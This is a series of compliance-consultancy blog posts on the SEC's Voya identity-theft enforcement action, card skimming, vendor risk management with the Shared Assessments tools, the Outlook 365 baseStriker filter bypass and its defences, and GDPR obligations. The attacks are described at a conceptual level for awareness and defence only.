Facebook Connect is a platform that levels the playing field between SME and large enterprises and streamlined offering to customers. Roughly 80% of SMEs use Facebook for marketing which makes the iconic social media platform the most popular tool for small business marketers in the digital world and beyond. With its rise in popularity, Facebook has also become the largest point of third party risk to SMEs and the recent hack is a testament to this. Not only are SMEs now firmly in the crosshairs of malicious actors, they are fast becoming their favored target because they are often woefully unprepared due to a lack of CapEx/OpEx resources, which translates into little or no cyber security measures in place. With issues like this, they are apt to now go to Google + as a social media network. I mean they’re a well known brand and certainly you can trust Google with security and transparency….right?
Cybersecurity SEC Enforcement Action
On 9/26/2018 the Securities and Exchange Commission charged Voya Financial Advisors, Inc. (‘VFA”), with violating the Safeguards Rule and the Identity Theft Red Flags Rule, which are designed to protect confidential customer information and protect customers from the risk of identity theft.
The SEC’s Order states that, over a six-day period in 2016, cyber intruders impersonated VFA contractors by calling VFA’s support line and requesting that the contractors’ passwords be reset. The intruders used the new passwords to gain access to the personal information of 5,600 VFA customers. The intruders then used the customer information to create new online customer profiles and obtain unauthorized access to account documents for three customers. VFA failed to terminate the intruders’ access. VFA also failed to apply its procedures to the systems used by its independent contractors, which was comprised largely of VFA’s workforce.
Without admitting or denying the SEC’s findings, VFA agreed to be censured and pay a $1 million penalty, and will retain an independent consultant to evaluate its policies and procedures for compliance with the Safeguards Rule and Identity Theft Red Flags Rule and related regulations.
Although VFA adopted a written Identity Theft Prevention Program, VFA violated the Identity Theft Red Flags Rule because it did not review and update the program in response to changes in risks to its customers. Additionally, VFA did not provide adequate training to its employees and contractors regarding the Identity Theft Prevention Program. Further, the Identity Theft Prevention Program did not include reasonable policies and procedures to respond to identity theft red flags.
Red Flag Rule
The Identity Theft Red Flags Rule requires certain financial institutions and creditors, including broker-dealers and investment advisers registered or required to be registered with the Commission, to develop and implement a written Identity Theft Prevention Program that is designed to detect, prevent, and mitigate identity theft in connection with the opening of a covered account or any existing covered account. An Identity Theft Prevention Program must include reasonable policies and procedures to:
identify relevant red flags for the covered accounts and incorporate them into the Identity Theft Prevention Program; detect the red flags that have been incorporated into the Identity Theft Prevention Program; respond appropriately to any red flags that are detected pursuant to the Identity Theft Prevention Program; and ensure that the Identity Theft Prevention Program is updated periodically to reflect changes in risks to customers from identity theft.
Identifying Red Flags
To identify Red Flags, firms must consider risk factors including but not limited to:
The methods in which the firm opens accounts; The methods in which the firm grants access to accounts; Any previous experiences with identity theft; Alerts, notifications or warnings from a credit reporting agency; Suspicious documents; The social security number, address, or telephone number provided by the applicant or customer is identical to that of another applicant or customer; Suspicious personal identifying information; Any unusual use of, or other suspicious activity related to, a covered account and; and Notification from clients, victims of identity theft, law enforcement authorities or other sources regarding possible identity theft.
Voya was compromised by a well-executed social engineering based attack or, malicious actors exploiting human behavior. While public perception is often that malicious actors start with a highly technical attack vector to gain access to a victim’s network, social engineering is actually the most common attack vector. Typically, after gaining access to a victim’s internal resources through social engineering, malicious actors will move laterally within a victim’s network. Firewalls and other intrusion prevention methods can be ineffective if employees are tricked into clicking on a malicious link they think came from a Facebook friend or LinkedIn connection. Whatever sophisticated protections a company puts in place, it must implement the right security policies and processes, measure their effectiveness and continuously improve. Otherwise, a crafty malicious actor can continue to adapt his/her socially engineering attacks around security measures.
People inherently want to trust and that's exactly what a successful social engineering attack exploits. If someone sends you an e-mail and it says that it's from another co-worker, you will likely trust it if it relates to something common to you and specific. Once that trust is established, you will have less reservations about clicking on links or images in the body of the e-mail. Similarly, if a phone caller has a credible explanation for needing certain information or systems access, then your tendency will be to trust it since most of the time that request will ultimately be legitimate. Most want to be kind and courteous and are trained to be compliant, especially in a work environment. This is heightened by a sense of frustration with a seemingly bureaucratic process or an expression of urgency….who isn’t busy or frustrated by safety bumps that 95% of the time are not necessary?
Malicious actors will often do weeks and months of background recon work to familiarize them with your workplace before stepping foot in your door, phishing your co-workers or making a phone call. Typical preparation might include finding a company phone list or org chart and researching employees on social networking sites like LinkedIn or Facebook. They know time is not on their side and any request will always demand a prompt response. This is the trap that VFA’s contractors fell into…
Regulatory Focus on Ongoing Review and Assessment of Information Security Policies
As it has for the past three years, in 2018, SEC’s Office of Compliance, Inspections and Examinations (OCIE) announced that it would include cybersecurity as an exam priority and allocated staff for this purpose. Firms and their employees have a responsibility to implement their cybersecurity policies and procedures and an obligation for ongoing continued monitoring. Aside from adequate technological systems, firms must provide training to both employees and contractors and stress the importance of security for a strong defense against data breaches and fraud. As noted above, from a security standpoint, independent contractors and other third-party vendors are the firm’s responsibility.
Cybersecurity policies and procedures must be reasonably designed to fit your specific business models. The SEC alleged that VFA violated the Safeguards Rule because its policies and procedures to protect customer information and to prevent and respond to cybersecurity incidents were not reasonably designed to meet these objectives.
The VFA action is yet another reminder by the SEC for firms to remain vigilant in their information security program, continue to actively assess not only their risk, but their third party provider risk, and implement controls that are appropriately designed to mitigate this risk.
NCS Regulatory Compliance offers comprehensive cybersecurity assessments to evaluate your current compliance status, analyze your level of vulnerability to attack, and provide guidance to mitigate risk, increase cybersecurity controls, and prevent an inevitable breach that could result in regulatory enforcement and fines. To learn more, contact your compliance consultant.
SEC Press Release: https://www.sec.gov/news/press-release/2018-213
SEC Administrative Proceeding: https://www.sec.gov/litigation/admin/2018/34-84288.pdf
SEC Red Flag Rule: https://www.sec.gov/info/smallbus/secg/identity-theft-red-flag-secg.htm
It’s summer time, sunscreen in your pocket while you’re vacation to a popular, sunny getaway…or a business trip. After swiping to cover that delicious dinner, your waiter returns with your credit card, the same card you used for those soft serve ice cream cones. Viola, a call from a 1-800 appears on your mobile phone. You let out a deep exhale because you know who’s on the other line, the automated female voice from your card company. You loathe it, you wish there were a way to avoid this annoying occurrence during your vacation, but you can’t because it’s the Fraud Detection Department calling to verify your transactions after disabling your credit card for protection.
That dreaded phone call has become a standard event during a vacation or any travel outside of your local area and you can thank those pesky card skimmers for this low point of your travels.
What is card skimming?
It is the common moniker for copying the most important information from the magnetic strips found on credit and debit cards. As you probably guessed, card skimmers take that important information and through different methods, use it for fraudulent transactions on the internet and/or at physical merchants.
You must be wondering how this is even possible in 2018 because your bank sent you a more “secure” card with a chip and surely, a card skimmer can’t grab vital information from that chip…but then again, think about how many times you swipe your card as opposed to inserting your chip. Yeah, I think we have your attention.
Let’s learn about how card skimming actually works, the different types and most importantly how to avoid it.
How does it actually work?
Card skimming is accomplished through a small device that illegally reads credit card information in an otherwise legitimate credit or debit card transaction. When a credit or debit card is swiped through a skimmer, the device captures and stores all the details, such as card number, expiration date and the card holder's full name stored in the card's magnetic stripe. Card skimmers are often placed over the card swipe mechanism on card readers in all kinds of businesses…but they’re predominantly located in ATMs and gas stations. With ATMs, the crooks may also place a small, undetectable camera nearby to record you entering your PIN. This gives the thief all the information needed to make fake cards and withdraw cash.
Occasionally, retail workers who frequently handle cards are recruited to be part of a skimming ring. These workers use a handheld device to skim your card during a transaction. Remember that great dinner you paid for on vacation, you handed your card to your waiter. The waiter walks away with your card, and for a dishonest waiter, this is the perfect opportunity to swipe your card through a skimmer without detection. For the honest waiter, there may be undetected card skimmer on the machine and he/she unknowingly gave your card information to malicious actors.
Once your card information is captured by a card skimmer, the skimming ring will either create a cloned card to make purchases in store, use the account to make online purchases, or sell the information on the internet. You are often unaware of the scam until it’s too late and you notice unauthorized charges on their account, your card is unexpectedly declined, or you receive an overdraft notification in the mail. Now, you should have a good understanding of why you get that annoying call from your card company during your travels. The good news is that you generally don’t have to pay, but the bad news is that you may need to resubmit your information to all those businesses that automatically debit your card every month. Its annoying, but its more… you feel like you have been violated.
How to Spot a Credit Card Skimmer
It’s very unlikely you’re going to avoid your favorite retail and restaurant spots because you’re leery of workers, but there are ways to become more vigilant and spot a card skimmer.
Best Mitigation Practices
Here are more tips to avoid card skimming.
Card skimming can be devastating to your sacred vacation and personal finances. We rely on our card issuers to notify us quickly and work with us to remove fraudulent charges to my card. However, there are instances when it’s too late and they have accumulated to billions of dollars of devastation. Stay safe out there, watch out for skimmers and always pick up that dreaded call to verify your transactions.
Seemingly every few months, there’s news of an organization and its subsequent data breach, resulting in its confidential data in the wrong hands. These security lapses have major consequences, ranging from regulatory scrutiny to fines, lawsuits, and consumer dissatisfaction.
While advances in cloud computing and managed services have made IT operations more agile, efficient and streamlined, those benefits have also introduced not only new vendor risks into your organization, but risks that are even closer to your most sensitive data than ever before.
There are four key trends driving the focus on third party/vendor risk management:
●Globalization: As the world gets flatter, organizations with global third-party networks are faced with a multitude of rules, policies, data, standards and regulations.
●Virtualization: Technology has dramatically changed the way organizations operate. With the advent of the cloud, virtual data centers, and hosted apps, companies are using vendors to process their critical business information, thus transferring data outside their firewalls. Recent data breaches and security incidents have highlighted the vendor risks that come with virtualization, and the need to have deeper visibility into the third-party ecosystem.
● Social Media: On one hand social media improves transparency, collaboration, and efficiency across third-party networks. On the other, it brings potential security risks and privacy concerns for business-critical information. The key is to leverage social media to gather third-party intelligence, while also identifying and mitigating the attendant risks.
● Mobility: Ubiquitous access to data across mobile devices poses multiple security risks. As data access becomes easier, and as security breaches proliferate, a strong third party/vendor risk management program is essential to ensure accountability.
This risk has become one of the biggest culprits of data breaches and has shifted the focus of IT leaders to it. Managing risk, in particular third party/vendor risk, has become an even more central concern. Who wants to work with a partner that’s careless with data? A third party’s reputation can ultimately affect your own organization’s. Outside vendors are an essential part of the technology stack however and it’s simply impossible to perform key functions without them. How do you determine whether a vendor will safeguard your data and handle it with the utmost care? This is the essence of third party/vendor risk management.
Third Party/Vendor Risk
It’s rare in 2018 for any organization to conduct all of its operations using only its own resources and personnel. For many, it takes business partners, often called “third party/vendor” partners, to get things done. Whether it’s a bank that uses vendor-managed cloud services to store and analyze its data, or a supermarket that hires an EPOS provider to process its credit card transactions, firms large and small rely on third party partners to manage tasks that frequently involve a high volume of sensitive information.
The question of trust looms large in such partnerships, particularly since an organization is often liable for its third party/vendor functions, even though they don’t directly carry them out. Third party/vendor risk management has become one of the most important risk issues facing organizations today. In addition to the growth of the vendor risk management professional, senior executives and boards increasingly find themselves involved in third party risk management as it has become an accepted and important element of a director/officer’s fiduciary duty to the company.
The process of assessing third party vendors and conducting security assessments and questionnaires can quickly become overwhelming. There are many organizations and governing bodies, which have their own guidelines. Throw in the increasing complexity of cybersecurity issues and your security team can quickly become buried under a mountain of tasks and processes that are ineffective and don’t actually protect data, customer, partners, and other key stakeholders. Just as cyber risk management requires a whole-of-company approach, a sophisticated vendor risk management program requires governance, policy, training, and technology (tools) to be effective.
Shared Assessments Program
A well known framework to assess third party/vendor risk is the Shared Assessments Program, which is used in over 115 countries and in a variety of industry verticals: financial services, energy, government, healthcare, manufacturing, pharmaceutical, retail, telecommunications, and education. The program is the trusted source for third party/vendor risk management with resources, including tools and best practices, to effectively manage the critical elements of the vendor risk management lifecycle. It follows a two-step approach to managing third party risks. Using industry-established best practices, the Shared Assessments Program follows a “trust, but verify” approach to conducting third party assessments, enabling you to fine-tune your third party risk management program according to your company’s strategy for managing risk.
Program in Depth
The Shared Assessments Program consists of three core tools that your organization can utilize to assess its third party/vendor risk.
There’s a GDPR tool kit as well (we have covered GDPR in a previous blog).
SIG (Standardized Information Gathering) questionnaire:
SIG is based on a comprehensive question library that determines how information technology and data security risks are managed across a broad spectrum of risk control areas. SIG Lite is designed to be completed by a third party vendor facilitating non-critical functions or posing less risk to the requesting organization. SIG Core is the next step up…designed to be completed by vendors supporting critical functions. The SIG Lite or SIG Core can be supplemented with additional questions from the SIG library as well or the SIG library can be used to do deep dives on targeted risk areas. These aren’t just “check the box” questions and answers. SIG is an in-depth questionnaire that gathers an incredible amount of information. The security domains covered include:
● Risk Management
● Security Policy
● Organizational Security
● Asset Management
● HR Security
● Physical and Environmental Security
● Communications and Operations Management
● Access Control
● Incident Event and Communications Management
● Business Continuity and Disaster Recovery
● Cloud Computing
● Additional Questions
For those who are intimidated by the size of SIG generally, then perhaps SIG Lite is the risk assessment framework to consider….its essentially a questionnaire covering all of the aforementioned topics, but achieves its goal with a distilled fraction of the questions in the full SIG library and significantly less than even the Core SIG library.
SCA (Standardized Control Assessment):
The SCA uses a standardized, efficient, substantiation-based protocol for on-site assessments that allows companies to evaluate their own controls, as well as those of their third-party service providers. Robust third-party risk management is achieved through a continuous re-evaluation of content and frequent updates, ensuring that the SCA remains relevant in terms of both current and emerging best practices. It defines 17 critical risk control areas listed below, procedures, and an on-site assessment reporting template, all of which enhance the efficiency of the assessment process.
● Risk assessment and treatment
● Security policy
● Organizational security
● Asset and information management
● Human resources security
● Physical and environmental security
● Operations management
● Access control
● Application security
● Incident event and communications management
● Business resiliency
● Network security
● Treatment management
● Server security
● Cloud security
VRMMM (Vendor Risk Management Maturity Model)
While the SIG and AUP are used to identify and evaluate your third party vendor’s risk, the focus of the VRMMM is to provide risk managers with a tool they can use to evaluate their vendor risk program against a comprehensive set of best practices. Essentially, it’s a scoreboard or report card to see how a vendor risk management program stacks up against standard practices.
VRMMM is updated yearly, but below is a list of the high-level components that make up the VRMMM:
● Monitor & Review
● Tools, Measurements & Analysis
● Communication and Information Sharing
● Skills and Expertise
● Vendor Risk Identification and Analysis
● Policies, Standards & Procedures
● Program Governance
Certified Third Party Risk Professional (CTPRP)
The Certified Third Party Risk Professional (CTPRP) designation is the only certification program that validates proficiencies in third party risk management concepts and principles, including managing the vendor lifecycle, vendor risk identification and rating, and the fundamentals of third party risk assessment, monitoring and management. Those that pass the exam will have a knowledge of third party risk principles of managing the third party lifecycle, identification of risks and rating, and the basics for risk assessments, monitoring and management.
Versatile for Internal Security Program Management
The Shared Assessments framework is the process to evaluate third party/vendor risk because it’s a thorough method to establish the security posture of your third party/vendors. There’s also another pertinent application for this framework: your own organization. The same framework that is used to establish a sense of trust between your organization and its vendors can easily be used to establish trust between your organization and its own security posture and processes. If your organization is a vendors to established businesses, adopted the Shared Assessment Framework as a governing document for your own information security program may be particularly compelling. Approaching your program with the Shared Assessments framework with this in mind, your organization can effectively kill two birds with one stone! With that noted, no animals were harmed in the drafting of this blog nor is such harm condoned.
In today’s complex, outsourced environment, it’s critical to step up third party/vendor risk management initiatives to protect both reputation and revenue. Gain a clear view of the third party/vendor relationships and collaborations, and adopt a proactive approach to manage their associated risks. Be well-prepared to manage supply chain disruptions by proactively identifying hidden risks, and using well-defined business continuity plans. Also, establish a robust closed-loop process to continuously evaluate third parties based on Shared Assessment Program. The key is to effectively manage the third-party ecosystem in such a way as to create a culture of transparency and accountability. Lastly, if appropriate for your risk profile, contemplate adopting the Shared Assessment framework as part of your own information security program.
Outlook 365 is a cloud-based email service designed to help meet your organization’s needs for robust security, reliability, and user productivity. It is widely used by enterprises globally for its ease of use, seamless integration, mobile access, and enhanced productivity.
When you move your organization to a cloud service, you must be able to trust your service provider with your most important, sensitive, and confidential data. Microsoft has robust policies, controls, and systems built into Outlook 365 to help keep your information safe. Microsoft’s security team is world class and it covers physical and network security for your email infrastructure. If you migrated from an on-premise/hybrid cloud setup of Outlook to cloud based Outlook 365, then congratulations. But while Outlook 365 offers a number of built-in data protection features, those features alone are usually not enough for the robust security posture required by the modern enterprise.
Let’s examine a recently discovered Outlook 365 vulnerability and how you can securely configure your Outlook setup to thwart this and similar future vulnerabilities.
Security researchers revealed an attack method to bypass a security feature of Microsoft Outlook 365, which is originally designed to protect users from malware and phishing attacks. Safe Link, part of Microsoft's Advanced Threat Protection (ATP) offering, works by replacing all URLs in an incoming email with Microsoft-owned secure URLs. Every time a user clicks on a link provided in an email, it first sends the user to a Microsoft owned domain, where it immediately checks the original URL for anything suspicious. If Microsoft's scanners detect any malicious element, it then warns users about it, and if not, it redirects the user to the original link.
The baseStriker attack sends a malicious link, which would ordinarily be blocked by Microsoft, past security filters by splitting the URL into two snippets of HTML: a base tag and a regular hypertext reference tag. The malicious URL is let through because the email filters are not handling the base HTML code correctly. ATP only performs the lookup on the base domain, and ignores the URL in the rest of the body. Because only part of the URL is tested, it mistakenly appears to not exist in the malicious URL database and the email is let through. Furthermore, Safe Link does not replace the malicious link. Consequently, the user gets the original malicious link and can click it to navigate to the phishing page.
In summary, this attack method may be the most severe security flaw in Outlook 365 since the service was created. Unlike other attacks that can be learned and blocked, this vulnerability allows hackers to completely bypass all of Microsoft’s security features and is the email equivalent of a virus that blinds the immune system. Even if the attack is already known, Microsoft does not have a way to see it and lets it through. We have only seen hackers using this vulnerability to send phishing attacks, but it is also capable of distributing ransomware, malware and other malicious content…potentially unleashing risks that its users have not been accustomed to on the platform.
Defense in Depth to Protect Outlook 365
There is no single solution to mitigate the attack described above and it is an example of a failure of controls at many levels. You cannot rely on a single Outlook 365 security feature, such as Safe Links, to reduce the likelihood of that attack, or any other, being successful. A layered defensive strategy using multiple Microsoft security features and controls stands a much better chance of preventing the attacker from succeeding.
The initial phishing attack can be mitigated using Microsoft EOP (Exchange Online Protection) and ATP. These security features go beyond just Safe Links, which was the source of the reported vulnerability. An attacker's email has to make it past every layer of EOP and ATP to successfully reach a user’s Inbox. It may also be removed from an Inbox by ATP if it is later determined that it was malicious, potentially before the user has even read it.
The user credential reuse risk can be mitigated by Azure Identity Protection. When Microsoft becomes aware of a breach containing a re-used set of credentials, you can have Azure Identity Protection alert you and automatically force the user's password to be reset. That security feature can also identify suspicious login patterns, such as an attacker logging in from a remote country. Azure Identity Protection is just one way to mitigate the re-use of compromised user credentials. Another security feature is enabling MFA (multi-factor authentication), which prevents user credentials being used by anyone but the account owner. Azure Active Directory conditional access can enforce MFA and other conditions on logins, such as requiring all logins to originate from trusted devices.
If the attacker manages to gain remote access to a user's computer, Windows Defender ATP can detect the suspicious behavior of the attacker's exploit tools and alert you to the breach immediately. If the attacker is performing reconnaissance of your network and attempting privilege escalation, Azure ATP can alert you to that suspicious activity immediately. On the chance that the attacker still manages to figure out who to send a phishing email to, the use of MFA and other identity protection measures mentioned earlier prevents them from directly exploiting a mailbox. That leaves them with email spoofing or impersonation as a vector, which can be mitigated with ATP once again.
All of those security measures mentioned above must be evaluated, tested, and deployed to be effective and some of them require additional investment in licenses. Unfortunately, there isn’t a single button to push that will turn on all of those security features; some of the features work in isolation, some of them are tightly integrated with other features. All of them work together to secure your organization’s Outlook 365 setup.
baseStriker is a perfect example of a very simple exploit which has a huge possibility to cause significant damage to your organization. As more organizations move further into cloud offerings, we will need keep more aware of the potential security risks and remain vigilant.
As you know, unlike MFIDII or other pan-European regulations, the General Data Protection Regulation (GDPR) reaches it beyond the EU and impacts those businesses that formerly thought they were safely ensconced in the U.S. For some, they are still wondering if they have to comply with it….I mean, shouldn’t they be getting a letter in the mail or something? But then, there are the rather large fines they might hear about…20mn EUD or $28mn USD depending on exchange rate and all of a sudden, the veil of willful ignorance must lift and they must ask: What about us?
What is GDPR and Why does it exist?
The short answer to that question is public concern over privacy. The EU has long had more stringent rules around how companies use the personal data of its citizens. In 1995, the EU enacted the Data Protection Directive. This was well before the Internet became a constant data marketplace that it is today. Consequently, the directive is outdated and does not address the many ways in which data is stored, collected and transferred today. Thus, EU Parliament adopted the GDPR in April 2016, replacing the outdated data protection directive from 1995. GDPR consists of 11 chapters and 91 articles that outline the requirements and regulations required of businesses to protect the personal data and the privacy of EU citizens for transactions that occur within EU member states. GDPR also regulates the exportation of personal data outside the EU. The regulation is consistent across all 28 EU member states, which means that a company thankfully has just one standard to meet within the EU.
As noted above, foreign companies that collect data on citizens in European Union (EU) countries must also comply with GDPR. More specifically, if your foreign company interacts with any customer data from the EU’s 28 member states, then your company must comply with the pending regulation because it is subject to the aforementioned fine. If your company is in the clear, then rejoice, but I still encourage you to continue reading because this will prepare you for that moment when your company works with EU customer data. Most importantly, if your company is US based, with each Facebook debacle we are inching closer toward stricter data privacy regulation in the U.S.
Compliance with GDPR will cause some concerns and new expectations of your security team because the regulation takes a wide view of what constitutes personally identifiable information. Your company must utilize the same level of protection for data such as an individual’s IP address or cookie data as it does for Name, Address and Social Security number. Like any regulation, it is an inch deep and a mile wide with a lot to be desired in interpretation and candor. GDPR states that a company must provide a “reasonable” level of data control for personal data, but does not define what constitutes “reasonable”. This ambiguity gives EU’s GDPR governing body a lot of leeway when it comes to assessing fines for data breaches and non-compliance.
What types of data does the GDPR protect?
How does GDPR define “data control”?
GDPR states that data can’t be kept indefinitely. It requires a company to completely erase data when a data subject revokes its consent or a third-party requests data deletion or a third-party agreement comes to an end.
Which companies do GDPR affect?
The regulation affects any company that stores or processes personal information about EU citizens even if it does not have a business presence within the EU. Specific criteria is below:
Come again? The last criteria effectively encompasses almost all companies with less than 250 employees because it’s interpreted as any company processing, storing and exchanging data points on EU citizens.
When does my company need to be in compliance?
By now, you should have a good inclination about your company’s requirement to comply with GDPR. Your company must be compliant with GDPR by May 25, 2018. That’s this month!
Who within my company is be responsible for compliance?
The GDPR regulation defines several roles that are responsible for ensuring compliance:
GDPR holds Data Processors liable for breaches or non-compliance. It’s entirely possible that both your company and processing partner such as a cloud provider will be liable for penalties even if the fault is entirely on the processing partner. Yes, GDPR just injected third-party risk to your data processing and storage strategies and ultimately changes your company’s third-party selection and business interactions.
How does the GDPR affect my company and its third-party service providers?
The GDPR regulation places equal liability on a Data Controller (a company that owns the data) and a Data Processor (third-parties that manage or interact with a Data Controller’s data). The regulation is interpreted as such that a third-party Data Processor not in compliance with GDPR equals your company isn’t in compliance.
This means that all existing and new agreements with third-party Data Processors (IE, cloud providers, SaaS vendors, or payroll service providers) must explicitly declare data responsibilities within the GDPR structure. Also, agreements must define data management and protection processes, and data breach reporting.
GDPR has strict rules for reporting breaches:
What happens if my company isn’t in compliance with the GDPR?
GDPR allows for steep penalties ranging from 10-20mn EUD or 2-4% of global annual revenue for non-compliance. If your company isn’t compliant due to technical measures, the fine imposed may be up to 10mn EUD or 2% of global revenue from the prior year, whichever is greater. If not compliant due to key provisions of the GDPR, such as transferring data to third-parties with inadequate data protection measures, fines imposed may be up to 20mn EUD or 4% of global annual revenue from the prior year, whichever is greater.
What should my company do to prepare for the GDPR?
You want to know what data you store and process on EU citizens and understand the risks around it. Your risk assessment must outline measures taken to mitigate those risks.
Your company may already have a plan in place, but it must review and update it to ensure that it aligns with GDPR requirements. Data breach reporting is one of the trickiest areas of GDPR compliance, especially given the short timeframe of 72 hours because your company will still be trying to figure out the scope of a data breach and the appropriate response during that time frame. Given the required rapid response, it’s best to have a preexisting relationship with law enforcement or understand who you would reach out to. Typically, this would be either the Federal Bureau of Investigations or the Secret Service.
GDPR doesn’t clearly state whether the DPO needs to be a discrete position, so presumably your company can appoint someone as long as that person can ensure the data protection with no conflict of interest. In practical terms, this means that your IT manager or director, CTO or security manager are bad choices for your DPO. Your marketing manager is a conflict of interest while sensible options could be your head of finance, risk or legal. Your DPO doesn’t need to be someone within your company and so it may be easier to appoint a lawyer or external expert. GDPR states that a DPO may work for multiple organizations, so even HLC could function in such a role.
When it comes to GDPR compliance, your legal or compliance departments can’t do it alone. Instead, any department or employee at your company with involvement in processing personal data must be involved and trained appropriately about the GDPR.
The ability to collect personal data and contact individuals is the lifeblood of the charity and not-for-profit sectors. However, under GDPR, both must be in compliant with the same rules as every other company.
Smaller companies will be affected by GDPR, some more significantly than others. If your company is small, then it may not have the resources necessary to meet GDPR’s requirements. HLC is available to provide advice and technical expertise to help you through the process and maximize internal resources.
GDPR isn’t a simple checklist or one size fits all framework, it speaks in terms of broad standards instead of specific rules, requiring your company to take measures for compliance. Those measures will vary from your company to another one. GDPR is a comprehensive legal and regulatory framework that imposes complex initial requirements and ongoing duties upon your company. Compliance is a marathon, not a sprint.